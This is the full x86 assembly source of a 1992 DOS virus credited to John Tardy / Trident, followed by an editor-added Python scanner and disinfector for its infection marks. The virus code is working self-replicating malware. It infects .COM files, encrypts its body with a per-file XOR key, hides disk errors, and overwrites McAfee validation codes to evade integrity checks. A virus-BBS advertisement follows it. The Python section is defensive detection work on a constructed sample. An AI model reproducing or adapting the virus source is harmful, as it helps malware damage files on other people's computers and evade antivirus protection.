        Org 0h                          ; Generate .BIN file
Start:  Jmp MainVir                     ; Jump to decryptor code at EOF
        Db '*'                          ; Virus signature (very short)
;
; Decryptor procedure
;
MainVir: Call On1                       ; Push offset on stack
On1:    Pop BP                          ; Calculate virus offset
        Sub BP,Offset MainVir+3         ;
        Push Ax                         ; Save possible error code
        Lea Si,Crypt[BP]                ; Decrypt the virus with a
        Mov Di,Si                       ; very simple exclusive or
        Mov Cx,CryptLen                 ; function.
Decrypt: Lodsb                          ;
        Xor Al,0                        ;
        Stosb                           ;
        Loop Decrypt                    ;
DecrLen Equ $-MainVir                   ; Length of the decryptor
;
; Main initialization procedure
;
Crypt:  Mov Ax,Cs:OrgPrg[BP]            ; Store begin of host at
        Mov Bx,Cs:OrgPrg[BP]+2          ; cs:100h (begin of com)
        Mov Cs:Start+100h,Ax            ;
        Mov Cs:Start[2]+100h,Bx         ;
        Xor Ax,Ax                       ; Get original interrupt 24
        Push Ax                         ; (critical error handler)
        Pop Ds                          ;
        Mov Bx,Ds:[4*24h]               ;
        Mov Es,Ds:[4*24h]+4             ;
        Mov Word Ptr Cs:OldInt24[Bp],Bx ; And store it in a safe place
        Mov Word Ptr Cs:OldInt24+2[Bp],Es ;
        Lea Bx,NewInt24[Bp]             ; Install own critical error
        Push Cs                         ; handler to avoid messages
        Pop Es                          ; when a disk is write
        Mov Word Ptr Ds:[4*24h],Bx      ; protected and such things
        Mov Word Ptr Ds:[4*24h]+2,Es    ;
        Push Cs                         ;
        Pop Ds                          ;
        Mov Ah,30h                      ; Check if DOS version is
        Int 21h                         ; 3.0 or above for correct
        Cmp Al,3                        ; interrupt use
        Jae NoCLean                     ;
        Jmp Ready
NoClean: Mov Ah,1ah                     ; Store DTA at safe place
        Mov Dx,0fd00h                   ;
        Int 21h                         ;
        Mov Ah,4eh                      ; FindFirstFile function
Search: Lea Dx,FileSpec[BP]             ; Search for filespec given
        Xor Cx,Cx                       ; at FileSpec address
        Int 21h                         ;
        Jnc Found                       ; Found - Found
        Jmp Ready                       ; Not Found - Ready
Found:  Mov Ax,4300h                    ; Get file attributes and
        Mov Dx,0fd1eh                   ; store them on the stack
        Int 21h                         ;
        Push Cx                         ;
        Mov Ax,4301h                    ; clear file attributes
        Xor Cx,Cx                       ;
        Int 21h                         ;
        Mov Ax,3d02h                    ; open file with read/write
        Int 21h                         ; access
        Mov Bx,5700h                    ; save file date/time stamp
        Xchg Ax,Bx                      ; on the stack
        Int 21h                         ;
        Push Cx                         ;
        Push Dx                         ;
        Mov Ah,3fh                      ; read the first 4 bytes of
        Lea Dx,OrgPrg[BP]               ; the program into OrgPrg
        Mov Cx,4                        ;
        Int 21h                         ;
        Mov Ax,Cs:[OrgPrg][BP]          ; Check if renamed exe-file
        Cmp Ax,'ZM'                     ;
        Je ExeFile                      ;
        Cmp Ax,'MZ'                     ; Check if renamed weird exe-
        Je ExeFile                      ; file
        Mov Ah,Cs:[OrgPrg+3][BP]        ; Check if already infected
        Cmp Ah,'*'                      ;
        Jne Infect                      ;
ExeFile: Call Close                     ; If one of the checks is yes,
        Mov Ah,4fh                      ; close file and search next
        Jmp Search                      ; file
FSeek:  Xor Cx,Cx                       ; subroutine to jump to end
        Xor Dx,Dx                       ; or begin of file
        Int 21h                         ;
        Ret                             ;
Infect: Mov Ax,0fd1e[0]                 ; check if the file is
        Cmp Ax,'OC'                     ; COMMAN?.COM (usually result
        Jne NoCommand                   ; if COMMAND.COM)
        Mov Ax,0fd1e[2]                 ;
        Cmp Ax,'MM'                     ;
        Jne NoCommand                   ;
        Mov Ax,0fd1e[4]                 ;
        Cmp Ax,'NA'                     ;
        Jne NoCommand                   ;
        Mov Ax,4202h                    ; Jump to EOF
        Call Fseek                      ;
        Cmp Ax,0f000h                   ; Check if file too large
        Jae ExeFile
        Cmp Ax,VirS                     ; Check if file too short
        jbe ExeFile
        Sub Ax,VirS
        Xchg Cx,Dx
        Mov Dx,4200h
        Xchg Dx,Ax
        Mov EOFminVir[BP],Dx
        Int 21h
        Mov Ah,3fh
        Mov Dx,Offset Buffer
        Mov Cx,VirS
        Int 21h
        Cld
        Mov Si,Offset Buffer
        Mov Cx,VirLen
On5:    Push Cx
On6:    Lodsb
        Cmp Al,0
        Jne On4
        Loop On6
On4:    Cmp Cx,0
        Je Found0
        Pop Cx
        Cmp Si,SeekLen
        Jb On5
        Jmp NoCommand
Found0: Pop Cx
        Sub Si,Offset Buffer
        Sub Si,Cx
        Xor Cx,Cx
        Mov Dx,EOFminVir[BP]
        Add Dx,Si
        Mov Ax,4200h
        Int 21h
        Jmp CalcVirus
EOFminVir Dw 0
NoCommand: Mov Ax,4202h                 ; jump to EOF
        Call FSeek                      ;
        Cmp Ax,0f000h                   ; Check if file too large
        Jb NoExe1                       ; if yes, goto exefile
        Jmp ExeFile                     ;
NoExe1: Cmp Ax,10                       ; Check if file too short
        Ja NoExe2                       ; if yes, goto exefile
        Jmp ExeFile                     ;
NoExe2: Mov Cx,Dx                       ; calculate pointer to offset
        Mov Dx,Ax                       ; EOF-52 (for McAfee validation
        Sub Dx,52                       ; codes)
        Mov Si,Cx                       ; move file pointer to the
        Mov Di,Dx                       ; calculated address
        Mov Ax,4200h                    ;
        Int 21h                         ;
        Mov Ah,3fh                      ; read the last 52 bytes
        Mov Dx,0fb00h                   ; of the file
        Mov Cx,52                       ;
        Int 21h                         ;
        Cmp Ds:0Fb00h,0fdf0h            ; check if protected with the
        Jne Check2                      ; AG option
        Cmp Ds:0fb02h,0aac5h            ;
        Jne Check2                      ;
        Mov Ax,4200h                    ; yes - let virus overwrite
        Mov Cx,Si                       ; the code with itself, so
        Mov Dx,Di                       ; the file has no validation
        Int 21h                         ; code
        Jmp CalcVirus                   ;
Check2: Cmp Ds:0Fb00h+42,0fdf0h         ; check if protected with the
        Jne Eof                         ; AV option
        Cmp Ds:0Fb02h+42,0aac5h         ;
        Jne Eof                         ;
        Mov Ax,4200h                    ; yes - let virus overwrite
        Mov Cx,Si                       ; the code with itself, so
        Mov Dx,Di                       ; the file has no validation
        Add Dx,42                       ; code
        Int 21h                         ;
        Jmp CalcVirus                   ;
Eof:    Mov Ax,4202h                    ; not AG or AV - jump to
        Call Fseek                      ; EOF
CalcVirus: Sub Ax,3                     ; calculate the jump for the
        Mov Cs:CallPtr[BP]+1,Ax         ; virus start
GetCrypt: Mov Ah,2ch                    ; get 100s seconds for the
        Int 21h                         ; encryption value.
        Cmp Dl,0                        ; if not zero, goto NoZero
        Jne NoZero                      ;
        Jmp GetCrypt                    ;
NoZero: Mov Cs:Decrypt+2[BP],Dl         ; Store key into decryptor
        Lea Si,MainVir[BP]              ; Move changed decryptor to
        Mov Di,0fb00h                   ; a safe place in memory
        Mov Cx,DecrLen                  ;
        Rep Movsb                       ;
        Lea Si,Crypt[BP]                ; Encrypt the virus and merge
        Mov Cx,CryptLen                 ; it with the changed decryptor
Encrypt: Lodsb                          ; code
        Xor Al,Dl                       ;
        Stosb                           ;
        Loop Encrypt                    ;
        Mov Ah,40h                      ; append virus at EOF or over
        Lea Dx,0fb00h                   ; the validation code of
        Mov Cx,VirLen                   ; McAfee
        Int 21h                         ;
        Mov Ax,4200h                    ; Jump to BOF
        Call FSeek                      ;
        Mov Ah,40h                      ; Write Jump at BOF
        Lea Dx,CallPtr[BP]              ;
        Mov Cx,4                        ;
        Int 21h                         ;
        Call Close                      ; Jump to Close routine
Ready:  Mov Ah,1ah                      ; Restore DTA to normal
        Mov Dx,80h                      ; offset
        Int 21h                         ;
        Mov Ax,Cs:OldInt24[Bp]          ; remove critical error
        Mov Dx,Cs:OldInt24+2[Bp]        ; handler and store the
        Xor Bx,Bx                       ; original handler in the
        Push Bx                         ; interrupt table
        Pop Ds                          ;
        Mov Ds:[4*24h],Dx               ;
        Mov Ds:[4*24h]+2,Ax             ;
        Push Cs                         ;
        Pop Ds                          ;
        Pop Ax                          ; restore possible error code
        Mov Bx,100h                     ; nice way to jump to the
        Push Cs                         ; begin of the original host
        Push Bx                         ; code
        Retf                            ;
        Db ' (C) 1992 John Tardy / Trident '
Close:  Pop Si                          ; why???
        Pop Dx                          ; restore file date/time
        Pop Cx                          ; stamp
        Mov Ax,5701h                    ;
        Int 21h                         ;
        Mov Ah,3eh                      ; close file
        Int 21h                         ;
        Mov Ax,4301h                    ; restore file attributes
        Pop Cx                          ;
        Mov Dx,0fd1eh                   ;
        Int 21h                         ;
        Push Si                         ; why???
        Ret                             ;
        Db 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
        Db ' Satan spawn, the Caco-Daemon - Mor(T)alities Death '
;
; New critical error handler
;
NewInt24: Mov Al,3                      ; suppress any critical error
        Iret                            ; messages
OldInt24 Dd 0                           ; storage place for old int 24
CallPtr Db 0e9h,0,0                     ; jump to place at BOF
FileSpec Db '*.COM',0                   ; filespec and infection marker
OrgPrg: Int 20h                         ; original program
        Db 'JT'                         ;
CryptLen Equ $-Crypt                    ; encrypted part length
VirLen Equ $-MainVir                    ; total virus length
Buffer Equ 0f040h                       ; buffer offset
VirS Equ VirLen*2
SeekLen Equ Buffer+Virs
; ─────────────────────────────────────────────────────────────────────────
; ────────────────────> and Remember Don't Forget to Call <────────────────
; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
; ─────────────────────────────────────────────────────────────────────────
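The listing above leaves a handful of fixed marks in every host it touches, and those marks are what a scanner keys on. This added example is editor-written Python, not part of the original listing and not the author's code: it checks a .COM image for the marks the source itself documents (the `E9` near jump written at offset 0 from `CallPtr`, the `'*'` at offset 3 that the virus tests with `Cmp Ah,'*'`, the jump displacement of EOF-3 that lands on the appended decryptor, the `Call On1 / Pop BP` delta-offset prologue and the `Lodsb / Xor Al,key / Stosb / Loop` loop with the key patched in at `Decrypt+2`), recovers the per-file XOR key from that loop, confirms by decrypting and looking for the `(C) 1992 John Tardy / Trident` string, and restores the host from the four saved bytes at `OrgPrg`. The opcode bytes for the prologue and loop (`E8 00 00 5D`, `AC 34 ?? AA E2 FB`) are the editor's encoding of those instructions and are an assumption; the sample image is constructed and carries only these marks, not the virus body.

```python
"""
Read-only scanner and disinfector for the infection marks described in the
Caco-Daemon listing.  Editor-written example; sample inputs are constructed.
"""
import struct

# Assumed encodings (editor's):  E8 00 00 5D = call $+3 / pop bp  (MainVir/On1)
#                                AC 34 ?? AA E2 FB = lodsb / xor al,?? / stosb / loop -5
DELTA_PROLOGUE = b"\xe8\x00\x00\x5d"
XOR_LOOP_HEAD, XOR_LOOP_TAIL = b"\xac\x34", b"\xaa\xe2\xfb"
MARKER = ord("*")                       # the 4th byte written from CallPtr+3 (FileSpec's '*')
TRIDENT = b"John Tardy / Trident"       # lives in the encrypted part of the body


def find_xor_key(buf, start, window=32):
    """Return the key byte if the lodsb/xor/stosb/loop pattern sits within
    `window` bytes of `start`, else None.  The key is the xor immediate."""
    end = min(len(buf) - 6, start + window)
    for i in range(start, end + 1):
        if buf[i:i + 2] == XOR_LOOP_HEAD and buf[i + 3:i + 6] == XOR_LOOP_TAIL:
            return buf[i + 2]
    return None


def scan_com(buf):
    """Return a dict of findings plus a verdict for one COM image.
    A lone '*' at offset 3 is a weak signal (any COM whose 4th byte is 0x2A
    matches), so 'infected' requires the decrypted copyright string too."""
    r = {"verdict": "clean", "jump_target": None, "marker": False,
         "delta_prologue": False, "xor_key": None, "trident_string": False}
    if len(buf) < 4 or buf[0] != 0xE9:
        return r
    disp = struct.unpack_from("<H", buf, 1)[0]
    target = (3 + disp) & 0xFFFF        # file offset = load address - 100h
    r["jump_target"] = target
    r["marker"] = buf[3] == MARKER
    if target + 4 <= len(buf) and buf[target:target + 4] == DELTA_PROLOGUE:
        r["delta_prologue"] = True
        r["xor_key"] = find_xor_key(buf, target + 4)
    if r["xor_key"] is not None:
        # The decryptor itself is not encrypted; xoring it too is harmless here.
        decrypted = bytes(b ^ r["xor_key"] for b in buf[target:])
        r["trident_string"] = TRIDENT in decrypted
    hits = sum((r["marker"], r["delta_prologue"],
                r["xor_key"] is not None, r["trident_string"]))
    if r["marker"] and r["trident_string"]:
        r["verdict"] = "infected"
    elif hits >= 2:
        r["verdict"] = "suspicious"
    return r


def disinfect(buf, key, target):
    """Rebuild the host: the body is buf[target:], and its last 4 bytes (OrgPrg,
    encrypted) are the host's original first 4 bytes.  Assumes the plain
    append-at-EOF path; in the McAfee AG/AV overwrite paths the 52-byte
    validation area is already lost and cannot be recovered from the file."""
    head = bytes(b ^ key for b in buf[-4:])
    return head + buf[4:target]


def build_constructed_sample(key=0x5A):
    """Constructed test pair (clean host, marked image).  The tail carries only
    the marks the scanner looks for and an encrypted string; it is not a virus."""
    host = bytes([0xB4, 0x4C, 0xCD, 0x21]) + b"\x90" * 12      # mov ah,4Ch / int 21h / nops
    plain_part = b" (C) 1992 John Tardy / Trident " + host[:4]  # ends with the OrgPrg copy
    tail = (DELTA_PROLOGUE + b"\x90" * 4                         # placeholder for sub/push/lea/mov
            + XOR_LOOP_HEAD + bytes([key]) + XOR_LOOP_TAIL
            + bytes(b ^ key for b in plain_part))
    marked = b"\xe9" + struct.pack("<H", len(host) - 3) + b"*" + host[4:] + tail
    return host, marked


if __name__ == "__main__":
    host, marked = build_constructed_sample()
    report = scan_com(marked)
    print(report["verdict"], hex(report["xor_key"]), report["jump_target"])
    print(disinfect(marked, report["xor_key"], report["jump_target"]) == host)
```

The displacement arithmetic is the same one the virus uses in reverse: `CalcVirus` stores EOF-3 into the jump, so the target's file offset is `3 + disp`, which is exactly the original file length in the append-at-EOF case. Running this over a directory of `.COM` files and reporting `suspicious` as well as `infected` gives a cheap triage pass; the decrypted-string check is what turns a heuristic hit into a confirmed one.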